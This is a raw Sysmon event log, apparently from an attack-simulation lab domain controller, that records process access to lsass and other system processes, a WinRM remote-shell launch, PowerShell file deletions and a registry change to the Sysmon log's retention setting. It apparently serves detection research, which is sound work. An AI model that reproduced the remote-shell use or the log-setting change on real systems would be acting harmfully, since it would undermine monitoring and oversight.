10341000x8000000000000000647Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.826{266CAFBE-62C8-6064-0500-00000000AD01}620636C:\Windows\system32\csrss.exe{266CAFBE-6441-6064-DE02-00000000AD01}2784C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000646Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:01.826{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000645Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.826{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000644Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:01.826{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000643Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.826{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000642Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:01.826{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000641Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.826{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000640Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:01.826{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000639Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.826{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:01.826{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000637Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.826{266CAFBE-62C8-6064-0500-00000000AD01}620744C:\Windows\system32\csrss.exe{266CAFBE-6441-6064-DD02-00000000AD01}5116C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000636Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:01.826{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6441-6064-DD02-00000000AD01}5116C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000635Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.831{266CAFBE-6441-6064-DD02-00000000AD01}5116C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{266CAFBE-6441-6064-D466-120000000000}0x1266d40HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{266CAFBE-62DD-6064-0C00-00000000AD01}8C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x8000000000000000634Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:01.826{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000633Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:01.826{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000632Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.826{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
23542300x8000000000000000631Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.795{266CAFBE-641B-6064-3202-00000000AD01}5032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=A6C93EF11B43F8A31C4600397CBFF244,SHA256=2FE2E98A7E44C6FEE8F32C20338A7C17B993D186FAE65A8FB8A67CF29FEFE5BE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000630Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.795{266CAFBE-641B-6064-3202-00000000AD01}5032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=AEF1FD89F890E7C8A1D5825E9E97B6BB,SHA256=4A12E9EA523AF07FFE6C9A19A255BA623D31AAC12B24A310CBE74E4D654A03EA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000629Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:01.685{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000628Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:01.685{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000627Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.670{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x8000000000000000626Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.654{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000625Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:01.654{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000624Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.654{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
23542300x8000000000000000623Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.623{266CAFBE-6440-6064-D802-00000000AD01}4220ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000622Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.591{266CAFBE-6440-6064-D902-00000000AD01}3712ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000621Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:01.545{266CAFBE-6440-6064-D902-00000000AD01}3712C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Sysmon/Operational\RetentionDWORD (0x00000000) 23542300x8000000000000000620Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.232{266CAFBE-6440-6064-D902-00000000AD01}3712ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\sdvgceyb.cmdlineMD5=E9A1CCC35BAEA088C7D99C8314EA9603,SHA256=10B503EB5C6CFAC25725EED20B79B0616348E79BF47DD48131C30643E9421854,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000619Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
